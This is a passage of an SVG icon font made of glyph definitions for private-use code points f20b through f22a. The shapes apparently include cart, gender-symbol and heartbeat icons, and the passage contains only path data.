<glyph unicode="&#xf20b;" d="M992 912v-496q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v496q0 112 -80 192t-192 80h-272v-1152q0 -14 -9 -23t-23 -9h-160q-14 0 -23 9t-9 23v1344q0 14 9 23t23 9h464q135 0 249 -66.5t180.5 -180.5t66.5 -249zM1376 1376v-880q0 -135 -66.5 -249t-180.5 -180.5 t-249 -66.5h-464q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h160q14 0 23 -9t9 -23v-768h272q112 0 192 80t80 192v880q0 14 9 23t23 9h160q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf20c;" d="M1311 694v-114q0 -24 -13.5 -38t-37.5 -14h-202q-24 0 -38 14t-14 38v114q0 24 14 38t38 14h202q24 0 37.5 -14t13.5 -38zM821 464v250q0 53 -32.5 85.5t-85.5 32.5h-133q-68 0 -96 -52q-28 52 -96 52h-130q-53 0 -85.5 -32.5t-32.5 -85.5v-250q0 -22 21 -22h55 q22 0 22 22v230q0 24 13.5 38t38.5 14h94q24 0 38 -14t14 -38v-230q0 -22 21 -22h54q22 0 22 22v230q0 24 14 38t38 14h97q24 0 37.5 -14t13.5 -38v-230q0 -22 22 -22h55q21 0 21 22zM1410 560v154q0 53 -33 85.5t-86 32.5h-264q-53 0 -86 -32.5t-33 -85.5v-410 q0 -21 22 -21h55q21 0 21 21v180q31 -42 94 -42h191q53 0 86 32.5t33 85.5zM1536 1176v-1072q0 -96 -68 -164t-164 -68h-1072q-96 0 -164 68t-68 164v1072q0 96 68 164t164 68h1072q96 0 164 -68t68 -164z" />
<glyph unicode="&#xf20d;" d="M915 450h-294l147 551zM1001 128h311l-324 1024h-440l-324 -1024h311l383 314zM1536 1120v-960q0 -118 -85 -203t-203 -85h-960q-118 0 -203 85t-85 203v960q0 118 85 203t203 85h960q118 0 203 -85t85 -203z" />
<glyph unicode="&#xf20e;" horiz-adv-x="2048" d="M2048 641q0 -21 -13 -36.5t-33 -19.5l-205 -356q3 -9 3 -18q0 -20 -12.5 -35.5t-32.5 -19.5l-193 -337q3 -8 3 -16q0 -23 -16.5 -40t-40.5 -17q-25 0 -41 18h-400q-17 -20 -43 -20t-43 20h-399q-17 -20 -43 -20q-23 0 -40 16.5t-17 40.5q0 8 4 20l-193 335 q-20 4 -32.5 19.5t-12.5 35.5q0 9 3 18l-206 356q-20 5 -32.5 20.5t-12.5 35.5q0 21 13.5 36.5t33.5 19.5l199 344q0 1 -0.5 3t-0.5 3q0 36 34 51l209 363q-4 10 -4 18q0 24 17 40.5t40 16.5q26 0 44 -21h396q16 21 43 21t43 -21h398q18 21 44 21q23 0 40 -16.5t17 -40.5 q0 -6 -4 -18l207 -358q23 -1 39 -17.5t16 -38.5q0 -13 -7 -27l187 -324q19 -4 31.5 -19.5t12.5 -35.5zM1063 -158h389l-342 354h-143l-342 -354h360q18 16 39 16t39 -16zM112 654q1 -4 1 -13q0 -10 -2 -15l208 -360q2 0 4.5 -1t5.5 -2.5l5 -2.5l188 199v347l-187 194 q-13 -8 -29 -10zM986 1438h-388l190 -200l554 200h-280q-16 -16 -38 -16t-38 16zM1689 226q1 6 5 11l-64 68l-17 -79h76zM1583 226l22 105l-252 266l-296 -307l63 -64h463zM1495 -142l16 28l65 310h-427l333 -343q8 4 13 5zM578 -158h5l342 354h-373v-335l4 -6q14 -5 22 -13 zM552 226h402l64 66l-309 321l-157 -166v-221zM359 226h163v189l-168 -177q4 -8 5 -12zM358 1051q0 -1 0.5 -2t0.5 -2q0 -16 -8 -29l171 -177v269zM552 1121v-311l153 -157l297 314l-223 236zM556 1425l-4 -8v-264l205 74l-191 201q-6 -2 -10 -3zM1447 1438h-16l-621 -224 l213 -225zM1023 946l-297 -315l311 -319l296 307zM688 634l-136 141v-284zM1038 270l-42 -44h85zM1374 618l238 -251l132 624l-3 5l-1 1zM1718 1018q-8 13 -8 29v2l-216 376q-5 1 -13 5l-437 -463l310 -327zM522 1142v223l-163 -282zM522 196h-163l163 -283v283zM1607 196 l-48 -227l130 227h-82zM1729 266l207 361q-2 10 -2 14q0 1 3 16l-171 296l-129 -612l77 -82q5 3 15 7z" />
<glyph unicode="&#xf210;" d="M0 856q0 131 91.5 226.5t222.5 95.5h742l352 358v-1470q0 -132 -91.5 -227t-222.5 -95h-780q-131 0 -222.5 95t-91.5 227v790zM1232 102l-176 180v425q0 46 -32 79t-78 33h-484q-46 0 -78 -33t-32 -79v-492q0 -46 32.5 -79.5t77.5 -33.5h770z" />
<glyph unicode="&#xf211;" d="M934 1386q-317 -121 -556 -362.5t-358 -560.5q-20 89 -20 176q0 208 102.5 384.5t278.5 279t384 102.5q82 0 169 -19zM1203 1267q93 -65 164 -155q-389 -113 -674.5 -400.5t-396.5 -676.5q-93 72 -155 162q112 386 395 671t667 399zM470 -67q115 356 379.5 622t619.5 384 q40 -92 54 -195q-292 -120 -516 -345t-343 -518q-103 14 -194 52zM1536 -125q-193 50 -367 115q-135 -84 -290 -107q109 205 274 370.5t369 275.5q-21 -152 -101 -284q65 -175 115 -370z" />
<glyph unicode="&#xf212;" horiz-adv-x="2048" d="M1893 1144l155 -1272q-131 0 -257 57q-200 91 -393 91q-226 0 -374 -148q-148 148 -374 148q-193 0 -393 -91q-128 -57 -252 -57h-5l155 1272q224 127 482 127q233 0 387 -106q154 106 387 106q258 0 482 -127zM1398 157q129 0 232 -28.5t260 -93.5l-124 1021 q-171 78 -368 78q-224 0 -374 -141q-150 141 -374 141q-197 0 -368 -78l-124 -1021q105 43 165.5 65t148.5 39.5t178 17.5q202 0 374 -108q172 108 374 108zM1438 191l-55 907q-211 -4 -359 -155q-152 155 -374 155q-176 0 -336 -66l-114 -941q124 51 228.5 76t221.5 25 q209 0 374 -102q172 107 374 102z" />
<glyph unicode="&#xf213;" horiz-adv-x="2048" d="M1500 165v733q0 21 -15 36t-35 15h-93q-20 0 -35 -15t-15 -36v-733q0 -20 15 -35t35 -15h93q20 0 35 15t15 35zM1216 165v531q0 20 -15 35t-35 15h-101q-20 0 -35 -15t-15 -35v-531q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM924 165v429q0 20 -15 35t-35 15h-101 q-20 0 -35 -15t-15 -35v-429q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM632 165v362q0 20 -15 35t-35 15h-101q-20 0 -35 -15t-15 -35v-362q0 -20 15 -35t35 -15h101q20 0 35 15t15 35zM2048 311q0 -166 -118 -284t-284 -118h-1244q-166 0 -284 118t-118 284 q0 116 63 214.5t168 148.5q-10 34 -10 73q0 113 80.5 193.5t193.5 80.5q102 0 180 -67q45 183 194 300t338 117q149 0 275 -73.5t199.5 -199.5t73.5 -275q0 -66 -14 -122q135 -33 221 -142.5t86 -247.5z" />
<glyph unicode="&#xf214;" d="M0 1536h1536v-1392l-776 -338l-760 338v1392zM1436 209v926h-1336v-926l661 -294zM1436 1235v201h-1336v-201h1336zM181 937v-115h-37v115h37zM181 789v-115h-37v115h37zM181 641v-115h-37v115h37zM181 493v-115h-37v115h37zM181 345v-115h-37v115h37zM207 202l15 34 l105 -47l-15 -33zM343 142l15 34l105 -46l-15 -34zM478 82l15 34l105 -46l-15 -34zM614 23l15 33l104 -46l-15 -34zM797 10l105 46l15 -33l-105 -47zM932 70l105 46l15 -34l-105 -46zM1068 130l105 46l15 -34l-105 -46zM1203 189l105 47l15 -34l-105 -46zM259 1389v-36h-114 v36h114zM421 1389v-36h-115v36h115zM583 1389v-36h-115v36h115zM744 1389v-36h-114v36h114zM906 1389v-36h-114v36h114zM1068 1389v-36h-115v36h115zM1230 1389v-36h-115v36h115zM1391 1389v-36h-114v36h114zM181 1049v-79h-37v115h115v-36h-78zM421 1085v-36h-115v36h115z M583 1085v-36h-115v36h115zM744 1085v-36h-114v36h114zM906 1085v-36h-114v36h114zM1068 1085v-36h-115v36h115zM1230 1085v-36h-115v36h115zM1355 970v79h-78v36h115v-115h-37zM1355 822v115h37v-115h-37zM1355 674v115h37v-115h-37zM1355 526v115h37v-115h-37zM1355 378 v115h37v-115h-37zM1355 230v115h37v-115h-37zM760 265q-129 0 -221 91.5t-92 221.5q0 129 92 221t221 92q130 0 221.5 -92t91.5 -221q0 -130 -91.5 -221.5t-221.5 -91.5zM595 646q0 -36 19.5 -56.5t49.5 -25t64 -7t64 -2t49.5 -9t19.5 -30.5q0 -49 -112 -49q-97 0 -123 51 h-3l-31 -63q67 -42 162 -42q29 0 56.5 5t55.5 16t45.5 33t17.5 53q0 46 -27.5 69.5t-67.5 27t-79.5 3t-67 5t-27.5 25.5q0 21 20.5 33t40.5 15t41 3q34 0 70.5 -11t51.5 -34h3l30 58q-3 1 -21 8.5t-22.5 9t-19.5 7t-22 7t-20 4.5t-24 4t-23 1q-29 0 -56.5 -5t-54 -16.5 t-43 -34t-16.5 -53.5z" />
<glyph unicode="&#xf215;" horiz-adv-x="2048" d="M863 504q0 112 -79.5 191.5t-191.5 79.5t-191 -79.5t-79 -191.5t79 -191t191 -79t191.5 79t79.5 191zM1726 505q0 112 -79 191t-191 79t-191.5 -79t-79.5 -191q0 -113 79.5 -192t191.5 -79t191 79.5t79 191.5zM2048 1314v-1348q0 -44 -31.5 -75.5t-76.5 -31.5h-1832 q-45 0 -76.5 31.5t-31.5 75.5v1348q0 44 31.5 75.5t76.5 31.5h431q44 0 76 -31.5t32 -75.5v-161h754v161q0 44 32 75.5t76 31.5h431q45 0 76.5 -31.5t31.5 -75.5z" />
<glyph unicode="&#xf216;" horiz-adv-x="2048" d="M1430 953zM1690 749q148 0 253 -98.5t105 -244.5q0 -157 -109 -261.5t-267 -104.5q-85 0 -162 27.5t-138 73.5t-118 106t-109 126.5t-103.5 132.5t-108.5 126t-117 106t-136 73.5t-159 27.5q-154 0 -251.5 -91.5t-97.5 -244.5q0 -157 104 -250t263 -93q100 0 208 37.5 t193 98.5q5 4 21 18.5t30 24t22 9.5q14 0 24.5 -10.5t10.5 -24.5q0 -24 -60 -77q-101 -88 -234.5 -142t-260.5 -54q-133 0 -245.5 58t-180 165t-67.5 241q0 205 141.5 341t347.5 136q120 0 226.5 -43.5t185.5 -113t151.5 -153t139 -167.5t133.5 -153.5t149.5 -113 t172.5 -43.5q102 0 168.5 61.5t66.5 162.5q0 95 -64.5 159t-159.5 64q-30 0 -81.5 -18.5t-68.5 -18.5q-20 0 -35.5 15t-15.5 35q0 18 8.5 57t8.5 59q0 159 -107.5 263t-266.5 104q-58 0 -111.5 -18.5t-84 -40.5t-55.5 -40.5t-33 -18.5q-15 0 -25.5 10.5t-10.5 25.5 q0 19 25 46q59 67 147 103.5t182 36.5q191 0 318 -125.5t127 -315.5q0 -37 -4 -66q57 15 115 15z" />
<glyph unicode="&#xf217;" horiz-adv-x="1664" d="M1216 832q0 26 -19 45t-45 19h-128v128q0 26 -19 45t-45 19t-45 -19t-19 -45v-128h-128q-26 0 -45 -19t-19 -45t19 -45t45 -19h128v-128q0 -26 19 -45t45 -19t45 19t19 45v128h128q26 0 45 19t19 45zM640 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5 t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1536 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1664 1088v-512q0 -24 -16 -42.5t-41 -21.5l-1044 -122q1 -7 4.5 -21.5t6 -26.5t2.5 -22q0 -16 -24 -64h920 q26 0 45 -19t19 -45t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 14 11 39.5t29.5 59.5t20.5 38l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t20 -15.5t13 -24.5t7.5 -26.5t5.5 -29.5t4.5 -25.5h1201q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf218;" horiz-adv-x="1664" d="M1280 832q0 26 -19 45t-45 19t-45 -19l-147 -146v293q0 26 -19 45t-45 19t-45 -19t-19 -45v-293l-147 146q-19 19 -45 19t-45 -19t-19 -45t19 -45l256 -256q19 -19 45 -19t45 19l256 256q19 19 19 45zM640 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5 t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1536 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1664 1088v-512q0 -24 -16 -42.5t-41 -21.5l-1044 -122q1 -7 4.5 -21.5t6 -26.5t2.5 -22q0 -16 -24 -64h920 q26 0 45 -19t19 -45t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 14 11 39.5t29.5 59.5t20.5 38l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t20 -15.5t13 -24.5t7.5 -26.5t5.5 -29.5t4.5 -25.5h1201q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf219;" horiz-adv-x="2048" d="M212 768l623 -665l-300 665h-323zM1024 -4l349 772h-698zM538 896l204 384h-262l-288 -384h346zM1213 103l623 665h-323zM683 896h682l-204 384h-274zM1510 896h346l-288 384h-262zM1651 1382l384 -512q14 -18 13 -41.5t-17 -40.5l-960 -1024q-18 -20 -47 -20t-47 20 l-960 1024q-16 17 -17 40.5t13 41.5l384 512q18 26 51 26h1152q33 0 51 -26z" />
<glyph unicode="&#xf21a;" horiz-adv-x="2048" d="M1811 -19q19 19 45 19t45 -19l128 -128l-90 -90l-83 83l-83 -83q-18 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83 q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-128 128l90 90l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83 q19 19 45 19t45 -19l83 -83zM237 19q-19 -19 -45 -19t-45 19l-128 128l90 90l83 -82l83 82q19 19 45 19t45 -19l83 -82l64 64v293l-210 314q-17 26 -7 56.5t40 40.5l177 58v299h128v128h256v128h256v-128h256v-128h128v-299l177 -58q30 -10 40 -40.5t-7 -56.5l-210 -314 v-293l19 18q19 19 45 19t45 -19l83 -82l83 82q19 19 45 19t45 -19l128 -128l-90 -90l-83 83l-83 -83q-18 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83 q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83zM640 1152v-128l384 128l384 -128v128h-128v128h-512v-128h-128z" />
<glyph unicode="&#xf21b;" d="M576 0l96 448l-96 128l-128 64zM832 0l128 640l-128 -64l-96 -128zM992 1010q-2 4 -4 6q-10 8 -96 8q-70 0 -167 -19q-7 -2 -21 -2t-21 2q-97 19 -167 19q-86 0 -96 -8q-2 -2 -4 -6q2 -18 4 -27q2 -3 7.5 -6.5t7.5 -10.5q2 -4 7.5 -20.5t7 -20.5t7.5 -17t8.5 -17t9 -14 t12 -13.5t14 -9.5t17.5 -8t20.5 -4t24.5 -2q36 0 59 12.5t32.5 30t14.5 34.5t11.5 29.5t17.5 12.5h12q11 0 17.5 -12.5t11.5 -29.5t14.5 -34.5t32.5 -30t59 -12.5q13 0 24.5 2t20.5 4t17.5 8t14 9.5t12 13.5t9 14t8.5 17t7.5 17t7 20.5t7.5 20.5q2 7 7.5 10.5t7.5 6.5 q2 9 4 27zM1408 131q0 -121 -73 -190t-194 -69h-874q-121 0 -194 69t-73 190q0 61 4.5 118t19 125.5t37.5 123.5t63.5 103.5t93.5 74.5l-90 220h214q-22 64 -22 128q0 12 2 32q-194 40 -194 96q0 57 210 99q17 62 51.5 134t70.5 114q32 37 76 37q30 0 84 -31t84 -31t84 31 t84 31q44 0 76 -37q36 -42 70.5 -114t51.5 -134q210 -42 210 -99q0 -56 -194 -96q7 -81 -20 -160h214l-82 -225q63 -33 107.5 -96.5t65.5 -143.5t29 -151.5t8 -148.5z" />
<glyph unicode="&#xf21c;" horiz-adv-x="2304" d="M2301 500q12 -103 -22 -198.5t-99 -163.5t-158.5 -106t-196.5 -31q-161 11 -279.5 125t-134.5 274q-12 111 27.5 210.5t118.5 170.5l-71 107q-96 -80 -151 -194t-55 -244q0 -27 -18.5 -46.5t-45.5 -19.5h-256h-69q-23 -164 -149 -274t-294 -110q-185 0 -316.5 131.5 t-131.5 316.5t131.5 316.5t316.5 131.5q76 0 152 -27l24 45q-123 110 -304 110h-64q-26 0 -45 19t-19 45t19 45t45 19h128q78 0 145 -13.5t116.5 -38.5t71.5 -39.5t51 -36.5h512h115l-85 128h-222q-30 0 -49 22.5t-14 52.5q4 23 23 38t43 15h253q33 0 53 -28l70 -105 l114 114q19 19 46 19h101q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-179l115 -172q131 63 275 36q143 -26 244 -134.5t118 -253.5zM448 128q115 0 203 72.5t111 183.5h-314q-35 0 -55 31q-18 32 -1 63l147 277q-47 13 -91 13q-132 0 -226 -94t-94 -226t94 -226 t226 -94zM1856 128q132 0 226 94t94 226t-94 226t-226 94q-60 0 -121 -24l174 -260q15 -23 10 -49t-27 -40q-15 -11 -36 -11q-35 0 -53 29l-174 260q-93 -95 -93 -225q0 -132 94 -226t226 -94z" />
<glyph unicode="&#xf21d;" d="M1408 0q0 -63 -61.5 -113.5t-164 -81t-225 -46t-253.5 -15.5t-253.5 15.5t-225 46t-164 81t-61.5 113.5q0 49 33 88.5t91 66.5t118 44.5t131 29.5q26 5 48 -10.5t26 -41.5q5 -26 -10.5 -48t-41.5 -26q-58 -10 -106 -23.5t-76.5 -25.5t-48.5 -23.5t-27.5 -19.5t-8.5 -12 q3 -11 27 -26.5t73 -33t114 -32.5t160.5 -25t201.5 -10t201.5 10t160.5 25t114 33t73 33.5t27 27.5q-1 4 -8.5 11t-27.5 19t-48.5 23.5t-76.5 25t-106 23.5q-26 4 -41.5 26t-10.5 48q4 26 26 41.5t48 10.5q71 -12 131 -29.5t118 -44.5t91 -66.5t33 -88.5zM1024 896v-384 q0 -26 -19 -45t-45 -19h-64v-384q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v384h-64q-26 0 -45 19t-19 45v384q0 53 37.5 90.5t90.5 37.5h384q53 0 90.5 -37.5t37.5 -90.5zM928 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5 t158.5 -65.5t65.5 -158.5z" />
<glyph unicode="&#xf21e;" horiz-adv-x="1792" d="M1280 512h305q-5 -6 -10 -10.5t-9 -7.5l-3 -4l-623 -600q-18 -18 -44 -18t-44 18l-624 602q-5 2 -21 20h369q22 0 39.5 13.5t22.5 34.5l70 281l190 -667q6 -20 23 -33t39 -13q21 0 38 13t23 33l146 485l56 -112q18 -35 57 -35zM1792 940q0 -145 -103 -300h-369l-111 221 q-8 17 -25.5 27t-36.5 8q-45 -5 -56 -46l-129 -430l-196 686q-6 20 -23.5 33t-39.5 13t-39 -13.5t-22 -34.5l-116 -464h-423q-103 155 -103 300q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5q224 0 351 -124 t127 -344z" />
<glyph unicode="&#xf221;" horiz-adv-x="1280" d="M1152 960q0 -221 -147.5 -384.5t-364.5 -187.5v-260h224q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-224q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v260q-150 16 -271.5 103t-186 224t-52.5 292 q11 134 80.5 249t182 188t245.5 88q170 19 319 -54t236 -212t87 -306zM128 960q0 -185 131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5z" />
<glyph unicode="&#xf222;" d="M1472 1408q26 0 45 -19t19 -45v-416q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v262l-382 -383q126 -156 126 -359q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123t223.5 45.5 q203 0 359 -126l382 382h-261q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h416zM576 0q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf223;" horiz-adv-x="1280" d="M830 1220q145 -72 233.5 -210.5t88.5 -305.5q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-217 24 -364.5 187.5 t-147.5 384.5q0 167 88.5 305.5t233.5 210.5q-165 96 -228 273q-6 16 3.5 29.5t26.5 13.5h69q21 0 29 -20q44 -106 140 -171t214 -65t214 65t140 171q8 20 37 20h61q17 0 26.5 -13.5t3.5 -29.5q-63 -177 -228 -273zM576 256q185 0 316.5 131.5t131.5 316.5t-131.5 316.5 t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf224;" d="M1024 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q126 -158 126 -359q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64 q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-149 16 -270.5 103t-186.5 223.5t-53 291.5q16 204 160 353.5t347 172.5q118 14 228 -19t198 -103l255 254h-134q-14 0 -23 9t-9 23v64zM576 256q185 0 316.5 131.5t131.5 316.5t-131.5 316.5 t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf225;" horiz-adv-x="1792" d="M1280 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q126 -158 126 -359q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64 q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-217 24 -364.5 187.5t-147.5 384.5q0 201 126 359l-52 53l-101 -111q-9 -10 -22 -10.5t-23 7.5l-48 44q-10 8 -10.5 21.5t8.5 23.5l105 115l-111 112v-134q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9 t-9 23v288q0 26 19 45t45 19h288q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-133l106 -107l86 94q9 10 22 10.5t23 -7.5l48 -44q10 -8 10.5 -21.5t-8.5 -23.5l-90 -99l57 -56q158 126 359 126t359 -126l255 254h-134q-14 0 -23 9t-9 23v64zM832 256q185 0 316.5 131.5 t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf226;" horiz-adv-x="1792" d="M1790 1007q12 -155 -52.5 -292t-186 -224t-271.5 -103v-260h224q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-512v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-224q-14 0 -23 9t-9 23v64q0 14 9 23 t23 9h224v260q-150 16 -271.5 103t-186 224t-52.5 292q17 206 164.5 356.5t352.5 169.5q206 21 377 -94q171 115 377 94q205 -19 352.5 -169.5t164.5 -356.5zM896 647q128 131 128 313t-128 313q-128 -131 -128 -313t128 -313zM576 512q115 0 218 57q-154 165 -154 391 q0 224 154 391q-103 57 -218 57q-185 0 -316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5zM1152 128v260q-137 15 -256 94q-119 -79 -256 -94v-260h512zM1216 512q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5q-115 0 -218 -57q154 -167 154 -391 q0 -226 -154 -391q103 -57 218 -57z" />
<glyph unicode="&#xf227;" horiz-adv-x="1920" d="M1536 1120q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q76 -95 107.5 -214t9.5 -247q-31 -182 -166 -312t-318 -156q-210 -29 -384.5 80t-241.5 300q-117 6 -221 57.5t-177.5 133t-113.5 192.5t-32 230 q9 135 78 252t182 191.5t248 89.5q118 14 227.5 -19t198.5 -103l255 254h-134q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q59 -74 93 -169q182 -9 328 -124l255 254h-134q-14 0 -23 9 t-9 23v64zM1024 704q0 20 -4 58q-162 -25 -271 -150t-109 -292q0 -20 4 -58q162 25 271 150t109 292zM128 704q0 -168 111 -294t276 -149q-3 29 -3 59q0 210 135 369.5t338 196.5q-53 120 -163.5 193t-245.5 73q-185 0 -316.5 -131.5t-131.5 -316.5zM1088 -128 q185 0 316.5 131.5t131.5 316.5q0 168 -111 294t-276 149q3 -29 3 -59q0 -210 -135 -369.5t-338 -196.5q53 -120 163.5 -193t245.5 -73z" />
<glyph unicode="&#xf228;" horiz-adv-x="2048" d="M1664 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q76 -95 107.5 -214t9.5 -247q-32 -180 -164.5 -310t-313.5 -157q-223 -34 -409 90q-117 -78 -256 -93v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23 t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-155 17 -279.5 109.5t-187 237.5t-39.5 307q25 187 159.5 322.5t320.5 164.5q224 34 410 -90q146 97 320 97q201 0 359 -126l255 254h-134q-14 0 -23 9 t-9 23v64zM896 391q128 131 128 313t-128 313q-128 -131 -128 -313t128 -313zM128 704q0 -185 131.5 -316.5t316.5 -131.5q117 0 218 57q-154 167 -154 391t154 391q-101 57 -218 57q-185 0 -316.5 -131.5t-131.5 -316.5zM1216 256q185 0 316.5 131.5t131.5 316.5 t-131.5 316.5t-316.5 131.5q-117 0 -218 -57q154 -167 154 -391t-154 -391q101 -57 218 -57z" />
<glyph unicode="&#xf229;" d="M1472 1408q26 0 45 -19t19 -45v-416q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v262l-213 -214l140 -140q9 -10 9 -23t-9 -22l-46 -46q-9 -9 -22 -9t-23 9l-140 141l-78 -79q126 -156 126 -359q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5 t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123t223.5 45.5q203 0 359 -126l78 78l-172 172q-9 10 -9 23t9 22l46 46q9 9 22 9t23 -9l172 -172l213 213h-261q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h416zM576 0q185 0 316.5 131.5t131.5 316.5t-131.5 316.5 t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
<glyph unicode="&#xf22a;" horiz-adv-x="1280" d="M640 892q217 -24 364.5 -187.5t147.5 -384.5q0 -167 -87 -306t-236 -212t-319 -54q-133 15 -245.5 88t-182 188t-80.5 249q-12 155 52.5 292t186 224t271.5 103v132h-160q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h160v165l-92 -92q-10 -9 -23 -9t-22 9l-46 46q-9 9 -9 22 t9 23l202 201q19 19 45 19t45 -19l202 -201q9 -10 9 -23t-9 -22l-46 -46q-9 -9 -22 -9t-23 9l-92 92v-165h160q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-160v-132zM576 -128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5 t131.5 -316.5t316.5 -131.5z" />
